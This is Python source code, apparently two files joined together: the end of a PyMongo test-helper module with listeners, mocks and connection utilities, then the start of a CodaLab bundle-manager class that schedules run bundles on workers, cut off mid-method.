def started(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).started(event)
def succeeded(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).succeeded(event)
def failed(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).failed(event)
class ServerAndTopologyEventListener(monitoring.ServerListener,
monitoring.TopologyListener):
"""Listens to all events."""
def __init__(self):
self.results = []
def opened(self, event):
self.results.append(event)
def description_changed(self, event):
self.results.append(event)
def closed(self, event):
self.results.append(event)
class HeartbeatEventListener(monitoring.ServerHeartbeatListener):
"""Listens to only server heartbeat events."""
def __init__(self):
self.results = []
def started(self, event):
self.results.append(event)
def succeeded(self, event):
self.results.append(event)
def failed(self, event):
self.results.append(event)
class MockSocketInfo(object):
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
class MockPool(object):
def __init__(self, *args, **kwargs):
self.pool_id = 0
self._lock = threading.Lock()
self.opts = PoolOptions()
def get_socket(self, all_credentials):
return MockSocketInfo()
def return_socket(self, *args, **kwargs):
pass
def _reset(self):
with self._lock:
self.pool_id += 1
def reset(self):
self._reset()
def close(self):
self._reset()
def update_is_writable(self, is_writable):
pass
def remove_stale_sockets(self, reference_pool_id):
pass
class ScenarioDict(dict):
"""Dict that returns {} for any unknown key, recursively."""
def __init__(self, data):
def convert(v):
if isinstance(v, collections.Mapping):
return ScenarioDict(v)
if isinstance(v, (py3compat.string_type, bytes)):
return v
if isinstance(v, collections.Sequence):
return [convert(item) for item in v]
return v
dict.__init__(self, [(k, convert(v)) for k, v in data.items()])
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# Unlike a defaultdict, don't set the key, just return a dict.
return ScenarioDict({})
class CompareType(object):
"""Class that compares equal to any object of the given type."""
def __init__(self, type):
self.type = type
def __eq__(self, other):
return isinstance(other, self.type)
def __ne__(self, other):
"""Needed for Python 2."""
return not self.__eq__(other)
class FunctionCallRecorder(object):
"""Utility class to wrap a callable and record its invocations."""
def __init__(self, function):
self._function = function
self._call_list = []
def __call__(self, *args, **kwargs):
self._call_list.append((args, kwargs))
return self._function(*args, **kwargs)
def reset(self):
"""Wipes the call list."""
self._call_list = []
def call_list(self):
"""Returns a copy of the call list."""
return self._call_list[:]
@property
def call_count(self):
"""Returns the number of times the function has been called."""
return len(self._call_list)
class TestCreator(object):
"""Class to create test cases from specifications."""
def __init__(self, create_test, test_class, test_path):
"""Create a TestCreator object.
:Parameters:
- `create_test`: callback that returns a test case. The callback
must accept the following arguments - a dictionary containing the
entire test specification (the `scenario_def`), a dictionary
containing the specification for which the test case will be
generated (the `test_def`).
- `test_class`: the unittest.TestCase class in which to create the
test case.
- `test_path`: path to the directory containing the JSON files with
the test specifications.
"""
self._create_test = create_test
self._test_class = test_class
self.test_path = test_path
def _ensure_min_max_server_version(self, scenario_def, method):
"""Test modifier that enforces a version range for the server on a
test case."""
if 'minServerVersion' in scenario_def:
min_ver = tuple(
int(elt) for
elt in scenario_def['minServerVersion'].split('.'))
if min_ver is not None:
method = client_context.require_version_min(*min_ver)(method)
if 'maxServerVersion' in scenario_def:
max_ver = tuple(
int(elt) for
elt in scenario_def['maxServerVersion'].split('.'))
if max_ver is not None:
method = client_context.require_version_max(*max_ver)(method)
return method
@staticmethod
def valid_topology(run_on_req):
return client_context.is_topology_type(
run_on_req.get('topology', ['single', 'replicaset', 'sharded']))
@staticmethod
def min_server_version(run_on_req):
version = run_on_req.get('minServerVersion')
if version:
min_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version >= min_ver
return True
@staticmethod
def max_server_version(run_on_req):
version = run_on_req.get('maxServerVersion')
if version:
max_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version <= max_ver
return True
def should_run_on(self, scenario_def):
run_on = scenario_def.get('runOn', [])
if not run_on:
# Always run these tests.
return True
for req in run_on:
if (self.valid_topology(req) and
self.min_server_version(req) and
self.max_server_version(req)):
return True
return False
def ensure_run_on(self, scenario_def, method):
"""Test modifier that enforces a 'runOn' on a test case."""
return client_context._require(
lambda: self.should_run_on(scenario_def),
"runOn not satisfied",
method)
def tests(self, scenario_def):
"""Allow CMAP spec test to override the location of test."""
return scenario_def['tests']
def create_tests(self):
for dirpath, _, filenames in os.walk(self.test_path):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
# Use tz_aware=False to match how CodecOptions decodes
# dates.
opts = json_util.JSONOptions(tz_aware=False)
scenario_def = ScenarioDict(
json_util.loads(scenario_stream.read(),
json_options=opts))
test_type = os.path.splitext(filename)[0]
# Construct test from scenario.
for test_def in self.tests(scenario_def):
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_").replace('.', '_'),
str(test_def['description'].replace(" ", "_").replace(
'.', '_')))
new_test = self._create_test(
scenario_def, test_def, test_name)
new_test = self._ensure_min_max_server_version(
scenario_def, new_test)
new_test = self.ensure_run_on(
scenario_def, new_test)
new_test.__name__ = test_name
setattr(self._test_class, new_test.__name__, new_test)
def _connection_string(h, authenticate):
if h.startswith("mongodb://"):
return h
elif client_context.auth_enabled and authenticate:
return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h))
else:
return "mongodb://%s" % (str(h),)
def _mongo_client(host, port, authenticate=True, direct=False, **kwargs):
"""Create a new client over SSL/TLS if necessary."""
host = host or client_context.host
port = port or client_context.port
client_options = client_context.default_client_options.copy()
if client_context.replica_set_name and not direct:
client_options['replicaSet'] = client_context.replica_set_name
client_options.update(kwargs)
client = MongoClient(_connection_string(host, authenticate), port,
**client_options)
return client
def single_client_noauth(h=None, p=None, **kwargs):
"""Make a direct connection. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, direct=True, **kwargs)
def single_client(h=None, p=None, **kwargs):
"""Make a direct connection, and authenticate if necessary."""
return _mongo_client(h, p, direct=True, **kwargs)
def rs_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_client(h=None, p=None, **kwargs):
"""Connect to the replica set and authenticate if necessary."""
return _mongo_client(h, p, **kwargs)
def rs_or_single_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Like rs_or_single_client, but does not authenticate.
"""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_or_single_client(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Authenticates if necessary.
"""
return _mongo_client(h, p, **kwargs)
def ensure_all_connected(client):
"""Ensure that the client's connection pool has socket connections to all
members of a replica set. Raises ConfigurationError when called with a
non-replica set client.
Depending on the use-case, the caller may need to clear any event listeners
that are configured on the client.
"""
ismaster = client.admin.command("isMaster")
if 'setName' not in ismaster:
raise ConfigurationError("cluster is not a replica set")
target_host_list = set(ismaster['hosts'])
connected_host_list = set([ismaster['me']])
admindb = client.get_database('admin')
# Run isMaster until we have connected to each host at least once.
while connected_host_list != target_host_list:
ismaster = admindb.command("isMaster",
read_preference=ReadPreference.SECONDARY)
connected_host_list.update([ismaster["me"]])
def one(s):
"""Get one element of a set"""
return next(iter(s))
def oid_generated_on_process(oid):
"""Makes a determination as to whether the given ObjectId was generated
by the current process, based on the 5-byte random number in the ObjectId.
"""
return ObjectId._random() == oid.binary[4:9]
def delay(sec):
return '''function() { sleep(%f * 1000); return true; }''' % sec
def get_command_line(client):
command_line = client.admin.command('getCmdLineOpts')
assert command_line['ok'] == 1, "getCmdLineOpts() failed"
return command_line
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def camel_to_upper_camel(camel):
return camel[0].upper() + camel[1:]
def camel_to_snake_args(arguments):
for arg_name in list(arguments):
c2s = camel_to_snake(arg_name)
arguments[c2s] = arguments.pop(arg_name)
return arguments
def parse_collection_options(opts):
if 'readPreference' in opts:
opts['read_preference'] = parse_read_preference(
opts.pop('readPreference'))
if 'writeConcern' in opts:
opts['write_concern'] = WriteConcern(
**dict(opts.pop('writeConcern')))
if 'readConcern' in opts:
opts['read_concern'] = ReadConcern(
**dict(opts.pop('readConcern')))
return opts
def server_started_with_option(client, cmdline_opt, config_opt):
"""Check if the server was started with a particular option.
:Parameters:
- `cmdline_opt`: The command line option (i.e. --nojournal)
- `config_opt`: The config file option (i.e. nojournal)
"""
command_line = get_command_line(client)
if 'parsed' in command_line:
parsed = command_line['parsed']
if config_opt in parsed:
return parsed[config_opt]
argv = command_line['argv']
return cmdline_opt in argv
def server_started_with_auth(client):
try:
command_line = get_command_line(client)
except OperationFailure as e:
msg = e.details.get('errmsg', '')
if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
# Unauthorized.
return True
raise
# MongoDB >= 2.0
if 'parsed' in command_line:
parsed = command_line['parsed']
# MongoDB >= 2.6
if 'security' in parsed:
security = parsed['security']
# >= rc3
if 'authorization' in security:
return security['authorization'] == 'enabled'
# < rc3
return security.get('auth', False) or bool(security.get('keyFile'))
return parsed.get('auth', False) or bool(parsed.get('keyFile'))
# Legacy
argv = command_line['argv']
return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
command_line = get_command_line(client)
# MongoDB 2.6.
if 'parsed' in command_line:
parsed = command_line['parsed']
if 'storage' in parsed:
storage = parsed['storage']
if 'journal' in storage:
return not storage['journal']['enabled']
return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
command_line = get_command_line(client)
if 'parsed' in command_line:
return command_line['parsed'].get('master', False)
return '--master' in command_line['argv']
def drop_collections(db):
# Drop all non-system collections in this database.
for coll in db.list_collection_names(
filter={"name": {"$regex": r"^(?!system\.)"}}):
db.drop_collection(coll)
def remove_all_users(db):
db.command("dropAllUsersFromDatabase", 1,
writeConcern={"w": client_context.w})
def joinall(threads):
"""Join threads with a 5-minute timeout, assert joins succeeded"""
for t in threads:
t.join(300)
assert not t.is_alive(), "Thread %s hung" % t
def connected(client):
"""Convenience to wait for a newly-constructed client to connect."""
with warnings.catch_warnings():
# Ignore warning that "ismaster" is always routed to primary even
# if client's read preference isn't PRIMARY.
warnings.simplefilter("ignore", UserWarning)
client.admin.command('ismaster') # Force connection.
return client
def wait_until(predicate, success_description, timeout=10):
"""Wait up to 10 seconds (by default) for predicate to be true.
E.g.:
wait_until(lambda: client.primary == ('a', 1),
'connect to the primary')
If the lambda-expression isn't true after 10 seconds, we raise
AssertionError("Didn't ever connect to the primary").
Returns the predicate's first true value.
"""
start = time.time()
interval = min(float(timeout)/100, 0.1)
while True:
retval = predicate()
if retval:
return retval
if time.time() - start > timeout:
raise AssertionError("Didn't ever %s" % success_description)
time.sleep(interval)
def is_mongos(client):
res = client.admin.command('ismaster')
return res.get('msg', '') == 'isdbgrid'
def assertRaisesExactly(cls, fn, *args, **kwargs):
"""
Unlike the standard assertRaises, this checks that a function raises a
specific class of exception, and not a subclass. E.g., check that
MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
"""
try:
fn(*args, **kwargs)
except Exception as e:
assert e.__class__ == cls, "got %s, expected %s" % (
e.__class__.__name__, cls.__name__)
else:
raise AssertionError("%s not raised" % cls)
@contextlib.contextmanager
def _ignore_deprecations():
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
yield
def ignore_deprecations(wrapped=None):
"""A context manager or a decorator."""
if wrapped:
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
with _ignore_deprecations():
return wrapped(*args, **kwargs)
return wrapper
else:
return _ignore_deprecations()
class DeprecationFilter(object):
def __init__(self, action="ignore"):
"""Start filtering deprecations."""
self.warn_context = warnings.catch_warnings()
self.warn_context.__enter__()
warnings.simplefilter(action, DeprecationWarning)
def stop(self):
"""Stop filtering deprecations."""
self.warn_context.__exit__()
self.warn_context = None
def get_pool(client):
"""Get the standalone, primary, or mongos pool."""
topology = client._get_topology()
server = topology.select_server(writable_server_selector)
return server.pool
def get_pools(client):
"""Get all pools."""
return [
server.pool for server in
client._get_topology().select_servers(any_server_selector)]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
"""Run a target function in many threads.
target is a function taking a Collection and an integer.
"""
threads = []
for i in range(NTHREADS):
bound_target = partial(target, collection, i)
threads.append(threading.Thread(target=bound_target))
for t in threads:
t.start()
for t in threads:
t.join(60)
assert not t.is_alive()
@contextlib.contextmanager
def frequent_thread_switches():
"""Make concurrency bugs more likely to manifest."""
interval = None
if not sys.platform.startswith('java'):
if hasattr(sys, 'getswitchinterval'):
interval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
else:
interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
yield
finally:
if not sys.platform.startswith('java'):
if hasattr(sys, 'setswitchinterval'):
sys.setswitchinterval(interval)
else:
sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
"""Test concurrent operations on a lazily-connecting client.
`reset` takes a collection and resets it for the next trial.
`target` takes a lazily-connecting collection and an index from
0 to NTHREADS, and performs some operation, e.g. an insert.
`test` takes the lazily-connecting collection and asserts a
post-condition to prove `target` succeeded.
"""
collection = client_context.client.pymongo_test.test
with frequent_thread_switches():
for i in range(NTRIALS):
reset(collection)
lazy_client = get_client()
lazy_collection = lazy_client.pymongo_test.test
run_threads(lazy_collection, target)
test(lazy_collection)
def gevent_monkey_patched():
"""Check if gevent's monkey patching is active."""
# In Python 3.6 importing gevent.socket raises an ImportWarning.
with warnings.catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
try:
import socket
import gevent.socket
return socket.socket is gevent.socket.socket
except ImportError:
return False
def eventlet_monkey_patched():
"""Check if eventlet's monkey patching is active."""
try:
import threading
import eventlet
return (threading.current_thread.__module__ ==
'eventlet.green.threading')
except ImportError:
return False
def is_greenthread_patched():
return gevent_monkey_patched() or eventlet_monkey_patched()
def disable_replication(client):
"""Disable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='alwaysOn')
def enable_replication(client):
"""Enable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='off')
class ExceptionCatchingThread(threading.Thread):
"""A thread that stores any exception encountered from run()."""
def __init__(self, *args, **kwargs):
self.exc = None
super(ExceptionCatchingThread, self).__init__(*args, **kwargs)
def run(self):
try:
super(ExceptionCatchingThread, self).run()
except BaseException as exc:
self.exc = exc
raise
def parse_read_preference(pref):
# Make first letter lowercase to match read_pref's modes.
mode_string = pref.get('mode', 'primary')
mode_string = mode_string[:1].lower() + mode_string[1:]
mode = read_preferences.read_pref_mode_from_name(mode_string)
max_staleness = pref.get('maxStalenessSeconds', -1)
tag_sets = pref.get('tag_sets')
return read_preferences.make_read_preference(
mode, tag_sets=tag_sets, max_staleness=max_staleness)
|
bundle_manager.py
|
import datetime
import logging
import os
import random
import re
import sys
import threading
import time
import traceback
from codalab.objects.permission import check_bundles_have_read_permission
from codalab.common import PermissionError, NotFoundError
from codalab.lib import bundle_util, formatting, path_util
from codalab.server.worker_info_accessor import WorkerInfoAccessor
from codalab.worker.file_util import remove_path
from codalab.worker.bundle_state import State, RunResources
logger = logging.getLogger(__name__)
WORKER_TIMEOUT_SECONDS = 60
SECONDS_PER_DAY = 60 * 60 * 24
# Fail unresponsive bundles in uploading, staged and running state after this many days.
BUNDLE_TIMEOUT_DAYS = 60
class BundleManager(object):
"""
Assigns run bundles to workers and makes make bundles.
"""
def __init__(self, codalab_manager):
config = codalab_manager.config.get('workers')
if not config:
print('config.json file missing a workers section.', file=sys.stderr)
sys.exit(1)
self._model = codalab_manager.model()
self._worker_model = codalab_manager.worker_model()
self._bundle_store = codalab_manager.bundle_store()
self._upload_manager = codalab_manager.upload_manager()
self._exiting_lock = threading.Lock()
self._exiting = False
self._make_uuids_lock = threading.Lock()
self._make_uuids = set()
def parse(to_value, field):
return to_value(config[field]) if field in config else None
self._max_request_time = parse(formatting.parse_duration, 'max_request_time') or 0
self._max_request_memory = parse(formatting.parse_size, 'max_request_memory') or 0
self._max_request_disk = parse(formatting.parse_size, 'max_request_disk') or 0
self._default_cpu_image = config.get('default_cpu_image')
self._default_gpu_image = config.get('default_gpu_image')
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
def run(self, sleep_time):
logger.info('Bundle manager running!')
while not self._is_exiting():
try:
self._run_iteration()
except Exception:
traceback.print_exc()
time.sleep(sleep_time)
while self._is_making_bundles():
time.sleep(sleep_time)
def signal(self):
with self._exiting_lock:
self._exiting = True
def _is_exiting(self):
with self._exiting_lock:
return self._exiting
def _run_iteration(self):
self._stage_bundles()
self._make_bundles()
self._schedule_run_bundles()
self._fail_unresponsive_bundles()
def _stage_bundles(self):
"""
Stages bundles by:
1) Failing any bundles that have any missing or failed dependencies.
2) Staging any bundles that have all ready dependencies.
"""
bundles = self._model.batch_get_bundles(state=State.CREATED)
parent_uuids = set(dep.parent_uuid for bundle in bundles for dep in bundle.dependencies)
parents = self._model.batch_get_bundles(uuid=parent_uuids)
all_parent_states = {parent.uuid: parent.state for parent in parents}
all_parent_uuids = set(all_parent_states)
bundles_to_fail = []
bundles_to_stage = []
for bundle in bundles:
parent_uuids = set(dep.parent_uuid for dep in bundle.dependencies)
try:
check_bundles_have_read_permission(
self._model, self._model.get_user(bundle.owner_id), parent_uuids
)
except PermissionError as e:
bundles_to_fail.append((bundle, str(e)))
continue
missing_uuids = parent_uuids - all_parent_uuids
if missing_uuids:
bundles_to_fail.append(
(bundle, 'Missing parent bundles: %s' % ', '.join(missing_uuids))
)
continue
parent_states = {uuid: all_parent_states[uuid] for uuid in parent_uuids}
acceptable_states = [State.READY]
if bundle.metadata.allow_failed_dependencies:
acceptable_states.append(State.FAILED)
acceptable_states.append(State.KILLED)
else:
failed_uuids = [
uuid for uuid, state in parent_states.items() if state == State.FAILED
]
killed_uuids = [
uuid for uuid, state in parent_states.items() if state == State.KILLED
]
failure_message = ''
if failed_uuids:
failure_message += ' Parent bundles failed: %s' % ', '.join(failed_uuids)
if killed_uuids:
failure_message += ' Parent bundles were killed: %s' % ', '.join(killed_uuids)
if failure_message:
failure_message += ' (Please use the --allow-failed-dependencies flag to depend on results fo failed or killed bundles)'
bundles_to_fail.append((bundle, failure_message))
continue
if all(state in acceptable_states for state in parent_states.values()):
bundles_to_stage.append(bundle)
for bundle, failure_message in bundles_to_fail:
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': failure_message}}
)
for bundle in bundles_to_stage:
logger.info('Staging %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
def _make_bundles(self):
# Re-stage any stuck bundles. This would happen if the bundle manager
# died.
for bundle in self._model.batch_get_bundles(state=State.MAKING, bundle_type='make'):
if not self._is_making_bundle(bundle.uuid):
logger.info('Re-staging make bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='make'):
logger.info('Making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.MAKING})
with self._make_uuids_lock:
self._make_uuids.add(bundle.uuid)
# Making a bundle could take time, so do the work in a separate
# thread to ensure quick scheduling.
threading.Thread(target=BundleManager._make_bundle, args=[self, bundle]).start()
def _is_making_bundles(self):
with self._make_uuids_lock:
return bool(self._make_uuids)
def _is_making_bundle(self, uuid):
with self._make_uuids_lock:
return uuid in self._make_uuids
def _make_bundle(self, bundle):
try:
bundle_location = self._bundle_store.get_bundle_location(bundle.uuid)
path = os.path.normpath(bundle_location)
deps = []
for dep in bundle.dependencies:
parent_bundle_path = os.path.normpath(
self._bundle_store.get_bundle_location(dep.parent_uuid)
)
dependency_path = os.path.normpath(
os.path.join(parent_bundle_path, dep.parent_path)
)
if not dependency_path.startswith(parent_bundle_path) or (
not os.path.islink(dependency_path) and not os.path.exists(dependency_path)
):
raise Exception(
'Invalid dependency %s'
% (path_util.safe_join(dep.parent_uuid, dep.parent_path))
)
child_path = os.path.normpath(os.path.join(path, dep.child_path))
if not child_path.startswith(path):
raise Exception('Invalid key for dependency: %s' % (dep.child_path))
deps.append((dependency_path, child_path))
remove_path(path)
if len(deps) == 1 and deps[0][1] == path:
path_util.copy(deps[0][0], path, follow_symlinks=False)
else:
os.mkdir(path)
for dependency_path, child_path in deps:
path_util.copy(dependency_path, child_path, follow_symlinks=False)
self._model.update_disk_metadata(bundle, bundle_location, enforce_disk_quota=True)
logger.info('Finished making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.READY})
except Exception as e:
logger.info('Failing bundle %s: %s', bundle.uuid, str(e))
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': str(e)}}
)
finally:
with self._make_uuids_lock:
self._make_uuids.remove(bundle.uuid)
def _cleanup_dead_workers(self, workers, callback=None):
"""
Clean-up workers that we haven't heard from for more than WORKER_TIMEOUT_SECONDS seconds.
Such workers probably died without checking out properly.
"""
for worker in workers.workers():
if datetime.datetime.now() - worker['checkin_time'] > datetime.timedelta(
seconds=WORKER_TIMEOUT_SECONDS
):
logger.info(
'Cleaning up dead worker (%s, %s)', worker['user_id'], worker['worker_id']
)
self._worker_model.worker_cleanup(worker['user_id'], worker['worker_id'])
workers.remove(worker)
if callback is not None:
callback(worker)
def _restage_stuck_starting_bundles(self, workers):
"""
Moves bundles that got stuck in the STARTING state back to the STAGED
state so that they can be scheduled to run again.
"""
for bundle in self._model.batch_get_bundles(state=State.STARTING, bundle_type='run'):
if (
not workers.is_running(bundle.uuid)
or time.time() - bundle.metadata.last_updated > 5 * 60
): # Run message went missing.
logger.info('Re-staging run bundle %s', bundle.uuid)
if self._model.transition_bundle_staged(bundle):
workers.restage(bundle.uuid)
def _acknowledge_recently_finished_bundles(self, workers):
"""
Acknowledge recently finished bundles to workers so they can discard run information.
"""
for bundle in self._model.batch_get_bundles(state=State.FINALIZING, bundle_type='run'):
worker = self._model.get_bundle_worker(bundle.uuid)
if worker is None:
logger.info(
'Bringing bundle offline %s: %s', bundle.uuid, 'No worker claims bundle'
)
self._model.transition_bundle_worker_offline(bundle)
elif self._worker_model.send_json_message(
worker['socket_id'], {'type': 'mark_finalized', 'uuid': bundle.uuid}, 0.2
):
logger.info(
'Acknowledged finalization of run bundle {} on worker {}'.format(
bundle.uuid, worker['worker_id']
)
)
bundle_location = self._bundle_store.get_bundle_location(bundle.uuid)
self._model.transition_bundle_finished(bundle, bundle_location)
def _bring_offline_stuck_running_bundles(self, workers):
"""
Make bundles that got stuck in the RUNNING or PREPARING state into WORKER_OFFLINE state.
Bundles in WORKER_OFFLINE state can be moved back to the RUNNING or PREPARING state if a
worker resumes the bundle indicating that it's still in one of those states.
"""
active_bundles = self._model.batch_get_bundles(
state=State.RUNNING, bundle_type='run'
) + self._model.batch_get_bundles(state=State.PREPARING, bundle_type='run')
now = time.time()
for bundle in active_bundles:
failure_message = None
if not workers.is_running(bundle.uuid):
failure_message = 'No worker claims bundle'
if now - bundle.metadata.last_updated > WORKER_TIMEOUT_SECONDS:
failure_message = 'Worker offline'
if failure_message is not None:
logger.info('Bringing bundle offline %s: %s', bundle.uuid, failure_message)
self._model.transition_bundle_worker_offline(bundle)
def _schedule_run_bundles_on_workers(self, workers, user_owned):
"""
Schedules STAGED bundles to run on the given workers. If user_owned is
True, then schedules on workers run by the owner of each bundle.
Otherwise, uses CodaLab-owned workers, which have user ID root_user_id.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
if user_owned:
workers_list = workers.user_owned_workers(bundle.owner_id)
else:
if not self._model.get_user_parallel_run_quota_left(bundle.owner_id):
logger.info(
"User %s has no parallel run quota left, skipping job for now",
bundle.owner_id,
)
continue # Don't start this bundle yet
workers_list = workers.user_owned_workers(self._model.root_user_id)
workers_list = self._deduct_worker_resources(workers_list)
bundle_resources = self._compute_bundle_resources(bundle)
workers_list = self._filter_and_sort_workers(workers_list, bundle, bundle_resources)
for worker in workers_list:
if self._try_start_bundle(workers, worker, bundle):
break
def _deduct_worker_resources(self, workers_list):
"""
From each worker, subtract resources used by running bundles. Modifies the list.
"""
for worker in workers_list:
for uuid in worker['run_uuids']:
try:
bundle = self._model.get_bundle(uuid)
except NotFoundError:
logger.info(
'Bundle %s in WorkerInfoAccessor but no longer found. Skipping for resource deduction.',
uuid,
)
continue
bundle_resources = self._compute_bundle_resources(bundle)
worker['cpus'] -= bundle_resources.cpus
worker['gpus'] -= bundle_resources.gpus
worker['memory_bytes'] -= bundle_resources.memory
return workers_list
@staticmethod
def _filter_and_sort_workers(workers_list, bundle, bundle_resources):
"""
Filters the workers to those that can run the given bundle and returns
the list sorted in order of preference for running the bundle.
"""
# keep track of which workers have GPUs
has_gpu = {}
for worker in workers_list:
worker_id = worker['worker_id']
has_gpu[worker_id] = worker['gpus'] > 0
# Filter by CPUs.
workers_list = [
worker for worker in workers_list if worker['cpus'] >= bundle_resources.cpus
]
# Filter by GPUs.
if bundle_resources.gpus:
workers_list = [
worker for worker in workers_list if worker['gpus'] >= bundle_resources.gpus
]
# Filter by memory.
workers_list = [
worker for worker in workers_list if worker['memory_bytes'] >= bundle_resources.memory
]
# Filter by tag.
request_queue = bundle.metadata.request_queue
if request_queue:
tagm = re.match('tag=(.+)', request_queue)
if tagm:
workers_list = [worker for worker in workers_list if worker['tag'] == tagm.group(1)]
else:
# We don't know how to handle this type of request queue
# argument.
return []
# Sort workers list according to these keys in the following succession:
# - whether the worker is a CPU-only worker, if the bundle doesn't request GPUs
# - number of dependencies available, descending
# - number of free cpus, descending
# - random key
#
# Breaking ties randomly is important, since multiple workers frequently
# have the same number of dependencies and free CPUs for a given bundle
# (in particular, bundles with no dependencies) and we may end up
# selecting the same worker over and over again for new jobs. While this
# is not a problem for the performance of the jobs themselves, this can
# cause one worker to collect a disproportionate number of dependencies
# in its cache.
needed_deps = set([(dep.parent_uuid, dep.parent_path) for dep in bundle.dependencies])
def get_sort_key(worker):
if worker['shared_file_system']:
num_available_deps = len(needed_deps)
else:
deps = set(worker['dependencies'])
num_available_deps = len(needed_deps & deps)
worker_id = worker['worker_id']
# if the bundle doesn't request GPUs (only request CPUs), prioritize workers that don't have GPUs
gpu_priority = bundle_resources.gpus or not has_gpu[worker_id]
return (gpu_priority, num_available_deps, worker['cpus'], random.random())
workers_list.sort(key=get_sort_key, reverse=True)
return workers_list
def _try_start_bundle(self, workers, worker, bundle):
"""
Tries to start running the bundle on the given worker, returning False
if that failed.
"""
if self._model.transition_bundle_starting(bundle, worker['user_id'], worker['worker_id']):
workers.set_starting(bundle.uuid, worker)
if worker['shared_file_system']:
# On a shared file system we create the path here to avoid NFS
# directory cache issues.
path = self._bundle_store.get_bundle_location(bundle.uuid)
remove_path(path)
os.mkdir(path)
if self._worker_model.send_json_message(
worker['socket_id'], self._construct_run_message(worker, bundle), 0.2
):
logger.info(
'Starting run bundle {} on worker {}'.format(bundle.uuid, worker['worker_id'])
)
return True
else:
self._model.transition_bundle_staged(bundle)
workers.restage(bundle.uuid)
return False
else:
return False
@staticmethod
def _compute_request_cpus(bundle):
"""
Compute the CPU limit used for scheduling the run.
The default of 1 is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if not bundle.metadata.request_cpus:
return 1
return bundle.metadata.request_cpus
@staticmethod
def _compute_request_gpus(bundle):
"""
Compute the GPU limit used for scheduling the run.
The default of 0 is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if bundle.metadata.request_gpus is None:
return 0
return bundle.metadata.request_gpus
@staticmethod
def _compute_request_memory(bundle):
"""
Compute the memory limit used for scheduling the run.
The default of 2g is for backwards compatibilty for
runs from before when we added client-side defaults
"""
if not bundle.metadata.request_memory:
return formatting.parse_size('2g')
return formatting.parse_size(bundle.metadata.request_memory)
def _compute_request_disk(self, bundle):
"""
Compute the disk limit used for scheduling the run.
The default is min(disk quota the user has left, global max)
"""
if not bundle.metadata.request_disk:
return min(
self._model.get_user_disk_quota_left(bundle.owner_id) - 1, self._max_request_disk
)
return formatting.parse_size(bundle.metadata.request_disk)
def _compute_request_time(self, bundle):
"""
Compute the time limit used for scheduling the run.
The default is min(time quota the user has left, global max)
"""
if not bundle.metadata.request_time:
return min(
self._model.get_user_time_quota_left(bundle.owner_id) - 1, self._max_request_time
)
return formatting.parse_duration(bundle.metadata.request_time)
def _get_docker_image(self, bundle):
"""
Set docker image to be the default if not specified
Unlike other metadata fields this can actually be None
from client
Also add the `latest` tag if no tag is specified to be
consistent with Docker's own behavior.
"""
if not bundle.metadata.request_docker_image:
if bundle.metadata.request_gpus:
docker_image = self._default_gpu_image
else:
docker_image = self._default_cpu_image
else:
docker_image = bundle.metadata.request_docker_image
if ':' not in docker_image:
docker_image += ':latest'
return docker_image
def _construct_run_message(self, worker, bundle):
"""
Constructs the run message that is sent to the given worker to tell it
to run the given bundle.
"""
message = {}
message['type'] = 'run'
message['bundle'] = bundle_util.bundle_to_bundle_info(self._model, bundle)
if worker['shared_file_system']:
message['bundle']['location'] = self._bundle_store.get_bundle_location(bundle.uuid)
for dependency in message['bundle']['dependencies']:
dependency['location'] = self._bundle_store.get_bundle_location(
dependency['parent_uuid']
)
# Figure out the resource requirements.
bundle_resources = self._compute_bundle_resources(bundle)
message['resources'] = bundle_resources.to_dict()
return message
def _compute_bundle_resources(self, bundle):
